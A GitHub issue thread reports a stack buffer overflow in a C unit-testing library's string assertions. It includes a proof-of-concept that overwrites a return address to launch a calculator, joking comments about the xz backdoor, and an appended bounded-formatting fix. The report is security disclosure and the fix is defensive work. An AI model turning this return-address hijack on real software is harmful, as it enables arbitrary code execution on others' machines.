
Exploitable stack buffer overflow #11

Open
msftedge opened this issue Mar 30, 2024 · 10 comments
Comments

@msftedge

msftedge commented Mar 30, 2024

Good afternoon,

There is a stack-based buffer overflow vulnerability in various functions of this library, including stest_assert_string_equal and assert_n_array_equal. If the library is used to test untrusted input (for example, a file you found in tukaani-project/xz), a devious individual would be able to construct a malicious file to achieve arbitrary code execution on anyone running the tests.

I have included an example of how it might look on x86_64 Linux. Here, as an example, I hijack the return address to go to a predefined function, but of course you could ROP instead.

#include "../src/stest.h"
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <stddef.h>
#include <string.h>   /* memset; <memory.h> is a non-standard alias */

#define without_logging(X) stest_disable_logging(); X; stest_enable_logging();
#define assert_test_passes(X) without_logging(X); stest_assert_last_passed(__FUNCTION__, __LINE__);
#define assert_test_fails(X) without_logging(X); stest_assert_last_failed(__FUNCTION__, __LINE__);

/* The function the overwritten return address is pointed at. */
static void example() {
  execl("/usr/bin/gnome-calculator", "gnome-calculator", NULL);
}

static void test_stack_nuke() {
  // E.g. read a wholesome file provided kindly by the XZ maintainer
  static char untrusted_input[10100] = {0};
  memset(untrusted_input, 'A', 10000);
  /* Place the address of example() after the padding; the double cast
     avoids the function-pointer-to-integer warning. */
  *(uint64_t*)&untrusted_input[10000] = (uint64_t)(uintptr_t)example;

  // What could go wrong
  assert_test_fails(assert_string_equal(NULL, untrusted_input));
}

void test_fixture_stest() {
  test_fixture_start();
  run_test(test_stack_nuke);
  test_fixture_end();
}

int main(int argc, char **argv) {
  return stest_testrunner(argc, argv, test_fixture_stest, NULL, NULL);
}

I trust you will fix this issue promptly, I am sure security is a high priority.
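The report above describes assertion helpers that copy caller-controlled strings into a fixed-size stack buffer. The following is an added example, not stest's code; it assumes (hypothetically) that the overflow comes from formatting the compared strings with an unbounded call such as sprintf, and shows the bounded equivalent: snprintf with an explicit truncation result, so a 10000-byte input can only shorten the message, never write past the buffer.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP 256   /* size of the fixed message buffer (assumed) */

/* Format "expected <a> but got <b>" into out, writing at most cap-1 bytes
 * plus the terminator. Returns true when the whole message fit, false when
 * it was truncated. Unlike sprintf, the output length never depends on
 * the length of the untrusted inputs. */
static bool format_mismatch(char *out, size_t cap,
                            const char *expected, const char *actual) {
    if (cap == 0) return false;
    int n = snprintf(out, cap, "expected \"%s\" but got \"%s\"",
                     expected ? expected : "(null)",
                     actual ? actual : "(null)");
    return n >= 0 && (size_t)n < cap;
}

/* Bounded string-equality check: reports the mismatch into msg and returns
 * whether the strings were equal. NULL is treated as a distinct value. */
static bool check_string_equal(const char *expected, const char *actual,
                               char *msg, size_t cap) {
    if (cap == 0) return false;
    msg[0] = '\0';
    if (expected == actual) return true;
    if (!expected || !actual || strcmp(expected, actual) != 0) {
        format_mismatch(msg, cap, expected, actual);
        return false;
    }
    return true;
}

/* Constructed input mirroring the report: 10000 'A' bytes compared against
 * NULL. The message is truncated to MSG_CAP-1 bytes instead of overflowing. */
static bool demo_overlong_input(void) {
    static char untrusted[10001];
    memset(untrusted, 'A', 10000);
    untrusted[10000] = '\0';
    char msg[MSG_CAP];
    bool equal = check_string_equal(NULL, untrusted, msg, sizeof msg);
    return !equal && strlen(msg) == MSG_CAP - 1;
}

/* Short inputs fit entirely and are reported without truncation. */
static bool demo_short_mismatch(void) {
    char msg[MSG_CAP];
    bool equal = check_string_equal("abc", "abd", msg, sizeof msg);
    return !equal && strcmp(msg, "expected \"abc\" but got \"abd\"") == 0;
}
```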

@dandykong

dandykong commented Mar 31, 2024

// E.g. read a wholesome file provided kindly by the XZ maintainer

Is this the same exact payload used to backdoor xz?

@vilari-mickopf

Is this exploit applicable to any Linux, or does it only target Debian/Red Hat distributions?

@64ArthurAraujo

Is this exploit applicable to any Linux, or does it only target Debian/Red Hat distributions?

xz-utils versions 5.6.0 and 5.6.1 are compromised; if you are not using Debian sid or another bleeding-edge distro you should be fine.

@vilari-mickopf

vilari-mickopf commented Apr 1, 2024

@64ArthurAraujo
It was just a joke about this issue because the entire issue is itself a joke.

@64ArthurAraujo

@64ArthurAraujo
It was just a joke about this issue because the entire issue is itself a joke.

I thought you were asking about the xz vulnerability lol

@SnzFor16Min

Good second issue! Unfortunately the maintainer would have considered this as a great new feature.

@vilari-mickopf

lgtm

@levizoesch

Damn, he was just trying to make sure he can get a hold of you about your car's extended warranty...

@nb-programmer

Don't worry, we'll just raise a PR in oss-fuzz to skip checking for stack buffer overflow in this repo :)

@danielgran

LGTM
